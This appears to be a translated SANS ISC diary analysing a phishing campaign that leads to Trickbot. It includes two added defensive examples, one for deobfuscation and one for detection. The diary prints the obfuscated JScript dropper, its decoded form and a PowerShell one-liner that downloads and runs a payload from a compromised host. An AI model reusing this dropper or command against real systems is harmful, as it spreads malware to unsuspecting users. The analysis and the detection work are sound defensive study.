
Taking a Look at an Interesting Phishing Sample

Phishing is an old topic, but to this day it remains popular with many attackers: an e-mail, an attachment, a link, and a well-crafted lie to go with them. It looks dated, yet targets fall for it again and again. Not long ago I picked up a very good sample that shows phishing campaigns are still an excellent way to infect computers! In this case the targeted user did the right thing and reported it to the security team.

Let's start by reviewing the classic initial e-mail:

[Screenshot: the initial e-mail]

When the victim clicks the link, the first screen mimics a PDF file. Note that the password given in the e-mail body is never used.

[Screenshot: the fake PDF page]

As you can see, the fake PDF shows nothing but a blank page. What do most users do in that situation? Exactly: they scroll down. That event can be intercepted with JavaScript:

window.onscroll = function (e) {
  // the malicious code is called from here
}

As soon as the victim starts scrolling, the following pop-up is displayed:

[Screenshot: the pop-up]

It asks the user to install an Adobe PDF plug-in update, which is in fact a Windows JavaScript file: "Adobe-PDF-Install.js".

[Screenshot: the Adobe-PDF-Install.js download]

Here is a dump of the script, beautified for readability (the array indexes and the numeric arguments of the cultrulf() calls did not survive the copy and show up as empty brackets and bare commas):

new Function(['var jingrang = new ActiveXObject("Scripting.FileSystemO', "blitzden", "MakcRulit586", "bearchuck", "swaybang"][] +["foxlinux", "AVEVARUM", 'bject");
var zitebrok = jingrang.GetSpecialFolder(2)+"\\\\\\\\ogc'][] + ['igr.txt";
var picture137 = jingrang.CreateTextFile(zitebrok, true);
picture137.', "ANIKVOBOL", "welcomes", "multicast"][] + ['WriteLine("dogstever");picture137.Close();
var tuesaint ', "ANILAZARO", "capchaos", "ilivhsaivhcazd"][] + ["houndchi", "SoulxGreatx", '= jingrang.GetFileVersion(zitebrok);
if(typeof tuesaint == "string"', "labareda"][] + ["vorezeak", ') {
  String.prototype.cultrulf = function () {
    var oscargator = []', "nguyen008"][] + ["doctelecom", ';
    for (var i = 0; i < arguments.length; i++) {
      oscargator.p', "gryunaca"][] + ['ush(arguments[i]);
    }
    return eval("String.fromCharCod', "banditcat", "taylor1970", "brabwhee"][] + iiksniglO() + String.fromCharCode(Math.floor(Math.random() + )) + ['(",")+")");
  }
};', "fledcinc", "cooledge"][])();

function iiksniglO(){
  return ("disintegrator", "pematric", "coupdrat", "sevenisis", 'e("+oscargator.joi'.banga123()) + clumblis() + 'oi';
}

function clumblis() {
  var objWMIService = GetObject("winmgmts:"); var o = "";
  try {
    var objLD = objWMIService.Get("Win32_LogicalDisk.DeviceID='y1:'"); o = "1";
  }
  catch (e) {
    o = '("+oscargator.j';} return o;
  }
  function String.prototype.banga123(){
    return this.split('').reverse().pop();
  }
  new Function("".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) +
 "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , , , , , , , , , ) + "".cultrulf(, , , , , , , , , , , , , ) + ''.cultrulf(, , , , , ))();
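A few words on what the obfuscation above actually does, followed by an added example that is not part of the original diary. The real string fragments are hidden inside arrays of junk words and picked out by index; String.prototype.cultrulf turns its numeric arguments into text through eval("String.fromCharCode(...)"); banga123 (split, reverse, pop) simply returns the first character of a string; and clumblis() delivers one fragment of that String.fromCharCode( text only from the catch branch of a WMI query for a drive "y1:" that does not exist, so the script only decodes correctly where GetObject("winmgmts:") works, i.e. inside a real Windows Script Host rather than a plain JavaScript engine or a sandbox that answers every WMI query with success. The Node.js code below reproduces that reassembly without eval and inlines cultrulf() calls into readable text. The numeric arguments in CONSTRUCTED_STAGE1 are invented for the example, since the dump does not contain the real ones, and the wmiGet callback stands in for objWMIService.Get.

```javascript
// Added example, not code from the diary: eval-free reconstruction of the
// string-building tricks used by Adobe-PDF-Install.js.

// What String.prototype.cultrulf computes, without going through eval().
function cultrulf(...codes) {
  return String.fromCharCode(...codes);
}

// What String.prototype.banga123 computes: split/reverse/pop is the first char.
function banga123(s) {
  return s.split('').reverse().pop();
}

// Math.floor(Math.random() + k) is always k for an integer k, so the "random"
// character in the sample is a constant. The value of k is not in the dump;
// only k = 110 ('n') makes the reassembled text valid JavaScript.
function constantFromRandom(k) {
  return String.fromCharCode(Math.floor(Math.random() + k));
}

// Model of clumblis(): `wmiGet` stands in for objWMIService.Get(). On a real
// host the query for drive 'y1:' throws, so only the catch path yields the
// fragment the decoder needs; an environment that returns success breaks it.
function clumblis(wmiGet) {
  let o = '';
  try {
    wmiGet("Win32_LogicalDisk.DeviceID='y1:'");
    o = '1';
  } catch (e) {
    o = '("+oscargator.j';
  }
  return o;
}

// iiksniglO() as in the sample: first char of the fragment + clumblis() + 'oi'.
function iiksniglO(wmiGet) {
  return banga123('e("+oscargator.joi') + clumblis(wmiGet) + 'oi';
}

// The `return eval(...)` statement that the scattered fragments spell out.
function reassembleStatement(wmiGet, hiddenChar) {
  return 'return eval("String.fromCharCod' + iiksniglO(wmiGet) + hiddenChar + '(",")+")");';
}

// Replace every "".cultrulf(n, n, ...) / ''.cultrulf(...) call in a stage-1
// expression with the text it produces and join the pieces: that is exactly
// what new Function(a + b + ...)() received.
function decodeCultrulfChain(expression) {
  const callRe = /(?:""|'')\.cultrulf\(([^)]*)\)/g;
  const pieces = [];
  let m;
  while ((m = callRe.exec(expression)) !== null) {
    const codes = m[1].split(',').map(a => a.trim()).filter(a => a.length).map(Number);
    if (codes.some(Number.isNaN)) throw new Error('non-numeric cultrulf argument: ' + m[0]);
    pieces.push(cultrulf(...codes));
  }
  return pieces.join('');
}

// Constructed stage-1 fragment in the shape of the sample's final call; the
// numbers are invented for this example, the dump does not contain the real ones.
const CONSTRUCTED_STAGE1 =
  'new Function("".cultrulf(118,97,114,32,120) + \'\'.cultrulf(61,49,59))();';

const throwingWmiGet = () => { throw new Error('Not found'); };
console.log(reassembleStatement(throwingWmiGet, constantFromRandom(110)));
console.log(decodeCultrulfChain(CONSTRUCTED_STAGE1));   // var x=1;
```

Running the block prints the reconstructed `return eval("String.fromCharCode("+oscargator.join(",")+")");` statement and the decoded text of the constructed stage-1 call. Against the real dump, decodeCultrulfChain() is the step that turns the long `new Function("".cultrulf(...) + ...)()` line into the dropper shown next, provided the numeric arguments are available.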
Once the garbage code is removed and the strings deobfuscated, you get the second stage: a JScript dropper that writes a PowerShell one-liner into a batch file and runs it (also beautified):

var fso = new ActiveXObject("Scripting.FileSystemObject");
var temp = fso.GetSpecialFolder(2);   // 2 = TemporaryFolder, i.e. %TEMP%
// PowerShell one-liner: download the payload to %TEMP%\noqnwutj.exe and start it
var script = "PowerShell \"function Ebfu8([String] $mcudvlsla) {" +
  "(New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'" + temp + "\\noqnwutj.exe');" +
  "Start-Process '" + temp + "\\noqnwutj.exe';}" +
  "try{Ebfu8('http://coinicos.io/images/logo.bin')}" +
  "catch{Ebfu8('http://coinicos.io/images/logo.bin')}\"";
var nameBat = "sdjkfh";
var pathBat = temp + "\\" + nameBat + ".bat";
// write the one-liner into %TEMP%\sdjkfh.bat ...
var outFile = fso.CreateTextFile(pathBat, true);
outFile.WriteLine(script);
outFile.Close();
// ... run it through WScript.Shell ...
var shell = new ActiveXObject("WScript.Shell");
shell.run(pathBat /*, window-style argument lost in the dump */);
// ... and delete the dropper itself
fso.DeleteFile(WSH.ScriptFullName);
It creates the following batch file in %TEMP%:

PowerShell "function Ebfu8([String] $mcudvlsla){(New-Object System.Net.WebClient).DownloadFile($mcudvlsla,'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe');Start-Process 'C:\DOCUME~1\Xavier\LOCALS~1\Temp\noqnwutj.exe';}try{Ebfu8('http://coinicos.io/images/logo.bin')}catch{Ebfu8('http://coinicos.io/images/logo.bin')}"
and executes it via cmd.exe:

cmd /c ""C:\DOCUME~1\Xavier\LOCALS~1\Temp\sdjkfh.bat" "
The name of the compromised website ("coinicos.io") might suggest a new cryptominer campaign, but that is not the case: the site is only used to deliver the payload, which is downloaded and executed by PowerShell. Its current VT score is 19/66 [1]. The PE file copies itself to %APPDATA%\Roaming\wsxmail\lloydt.exe and creates a scheduled task called "MsTools" for persistence (see my last diary [2]). This is a classic Trickbot [3]. To summarize, the infection path is:

Email > JavaScript > Batch file > PowerShell > PE (Trickbot) > Scheduled task
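That chain is also what a detection should key on. Below is an added example, not part of the original diary, in JavaScript (Node.js): a small detector that walks constructed process-creation events, flags the wscript.exe > cmd.exe > powershell.exe lineage together with the per-process tells seen in this sample (a .js run by wscript.exe, a .bat run from %TEMP%, a PowerShell download-and-execute one-liner, a payload URL with a non-executable extension, a process image in %TEMP%), and pulls the IOCs out of the PowerShell command line. The event fields (pid, ppid, image, commandLine), the PIDs and the Downloads path in SAMPLE_EVENTS are assumptions constructed for the example from the artefacts above, not any product's schema.

```javascript
// Added example, not from the diary: detecting the
// JavaScript > Batch file > PowerShell > PE chain in process-creation events.

// Constructed events modelled on the artefacts above (PIDs, field names and
// the Downloads path are assumptions made for this example).
const SAMPLE_EVENTS = [
  { pid: 100, ppid: 90, image: 'C:\\Windows\\explorer.exe', commandLine: 'explorer.exe' },
  { pid: 101, ppid: 100, image: 'C:\\Windows\\System32\\wscript.exe',
    commandLine: '"C:\\Windows\\System32\\wscript.exe" "C:\\Users\\user\\Downloads\\Adobe-PDF-Install.js"' },
  { pid: 102, ppid: 101, image: 'C:\\Windows\\System32\\cmd.exe',
    commandLine: 'cmd /c ""C:\\DOCUME~1\\Xavier\\LOCALS~1\\Temp\\sdjkfh.bat" "' },
  { pid: 103, ppid: 102, image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    commandLine: "PowerShell \"function Ebfu8([String] $mcudvlsla){(New-Object System.Net.WebClient)" +
      ".DownloadFile($mcudvlsla,'C:\\DOCUME~1\\Xavier\\LOCALS~1\\Temp\\noqnwutj.exe');" +
      "Start-Process 'C:\\DOCUME~1\\Xavier\\LOCALS~1\\Temp\\noqnwutj.exe';}" +
      "try{Ebfu8('http://coinicos.io/images/logo.bin')}catch{Ebfu8('http://coinicos.io/images/logo.bin')}\"" },
  { pid: 104, ppid: 103, image: 'C:\\DOCUME~1\\Xavier\\LOCALS~1\\Temp\\noqnwutj.exe', commandLine: 'noqnwutj.exe' },
  { pid: 105, ppid: 100, image: 'C:\\Windows\\System32\\notepad.exe', commandLine: 'notepad.exe' },  // benign
];

function baseName(p) { return p.split(/[\\/]/).pop().toLowerCase(); }

// Per-event tells; each check returns a reason string or null.
const CHECKS = [
  ev => baseName(ev.image) === 'wscript.exe' && /\.js["']?\s*$/i.test(ev.commandLine)
    ? 'wscript.exe executing a .js file' : null,
  ev => baseName(ev.image) === 'cmd.exe' && /\\temp\\[^\\"]+\.bat/i.test(ev.commandLine)
    ? 'cmd.exe running a batch file from %TEMP%' : null,
  ev => baseName(ev.image) === 'powershell.exe'
    && /DownloadFile\s*\(/i.test(ev.commandLine) && /Start-Process/i.test(ev.commandLine)
    ? 'PowerShell download-and-execute one-liner' : null,
  ev => /https?:\/\/[^\s'"()]+\.(?:bin|jpg|png|gif)\b/i.test(ev.commandLine)
    ? 'payload URL with a non-executable extension' : null,
  ev => /\\temp\\[^\\"]+\.exe$/i.test(ev.image)
    ? 'process image launched from %TEMP%' : null,
];

// Ancestry of an event as base names, oldest first (stops at unknown or
// cyclic parents).
function lineage(ev, byPid) {
  const names = [];
  const seen = new Set();
  for (let cur = ev; cur && !seen.has(cur.pid); cur = byPid.get(cur.ppid)) {
    seen.add(cur.pid);
    names.unshift(baseName(cur.image));
  }
  return names;
}

// One finding per suspicious event; `chain` marks the full
// wscript.exe > cmd.exe > powershell.exe lineage seen in this sample.
function detectDropperChain(events) {
  const byPid = new Map(events.map(e => [e.pid, e]));
  const findings = [];
  for (const ev of events) {
    const reasons = CHECKS.map(c => c(ev)).filter(Boolean);
    const lin = lineage(ev, byPid);
    const chain = lin.join('>').includes('wscript.exe>cmd.exe>powershell.exe');
    if (reasons.length || chain) findings.push({ pid: ev.pid, lineage: lin, reasons, chain });
  }
  return findings;
}

// Network and file IOCs from a PowerShell command line, de-duplicated.
function extractIocs(commandLine) {
  const urls = [...new Set(commandLine.match(/https?:\/\/[^\s'"()]+/gi) || [])];
  const files = [...new Set(commandLine.match(/[A-Z]:\\[^'"]+?\.exe/gi) || [])];
  return { urls, files };
}

for (const f of detectDropperChain(SAMPLE_EVENTS)) console.log(f);
console.log(extractIocs(SAMPLE_EVENTS[3].commandLine));
```

On the constructed events the detector reports the four processes of the chain (wscript.exe, cmd.exe, powershell.exe and the dropped executable) and leaves explorer.exe and notepad.exe alone; the PowerShell event carries both the download-and-execute and the non-executable-extension reasons, and the IOC extractor returns the single URL and the single dropped path even though each appears twice in the command line. The lineage walk matters more than any single regex: a .bat in %TEMP% or a WebClient call on its own is noisy, the wscript.exe > cmd.exe > powershell.exe ancestry is not.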

[1] https://www.virustotal.com/en/file/aff5fa4ec4cd78bcf5f1c712f361bbd7d428800bea08c23cae66f0947e66c2a3/analysis/1525780303/
[2] https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
[3] https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


*Source: SANS ISC; translated by FreeBuf editor secist. Please credit FreeBuf.COM when reposting.